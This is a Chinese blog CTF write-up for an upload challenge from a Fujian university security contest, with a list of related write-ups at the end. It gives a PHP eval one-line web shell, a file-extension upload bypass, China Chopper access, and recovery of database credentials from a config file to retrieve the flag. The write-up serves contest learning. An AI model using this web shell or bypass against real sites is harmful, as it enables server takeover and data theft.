第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-Writeup
2019-07-17 17:44
531 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43578492/article/details/96332720
上传绕过,菜刀连接数据库
得到上传路径,用菜刀链接
进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码
菜刀连接,配置一下
题目描述
解题思路
写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话:
<?php @eval($_POST['caidao']);?>
上传,抓包
jpg改为
php,GOGOGO发包
得到上传路径,用菜刀链接
进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码
菜刀连接,配置一下
<T>MYSQL</T> <H>localhost</H> <U>ctf</U> <P>ctfctfctf</P>
右键数据库管理,拿flag
得到FLAG
直接双击flag没有回显,改一下查询命令即可
flag{8ec2465a-86fc-4513-8e66-1b8cce1958e0}
END
相关文章推荐
- 第三届上海大学生网络安全大赛 junkcode writeup
- 陕西网络空间安全技术大赛pwn_box writeup
- 陕西省网络空间安全技术大赛部分题目writeup
- 第三届上海市大学生网络安全大赛 PWN200 WriteUp
- 第四届山东省网络安全技能大赛 write up
- 第三届全国网络空间安全技术大赛 Web补题 By Assassin(持续更新)
- 第六届山东省大学生网络安全技能大赛决赛Writeup
- 黑龙江省网络安全技能大赛 初赛 RE300 writeup ——Lilac 逆向组
- 陕西省第三届网络空间技术大赛心得
- RSA解密Write UP——2017湖南教育网络安全竞赛
- 网络信息安全攻防学习平台(基础关write up)
- 2018~第三届南宁市网络安全技术大赛~nnctf~write-up
- 第三届上海大学生网络安全大赛 流量分析
- 第三届上海大学生网络安全大赛小部分题解 By Assassin
- 2019年第五届陕西省网络空间安全技术大赛
- 蓝盾杯网络空间安全攻防对抗大赛小记
- 蓝盾杯网络空间安全***对抗大赛小记
- 西南石油大学第三届信息安全大赛-渗透6-upload
- 2016.11.17 12:28[明年一定参加福建网络空间安全大赛并且拿名次]
- 第二届“强网杯”全国网络安全挑战赛WRITE-UP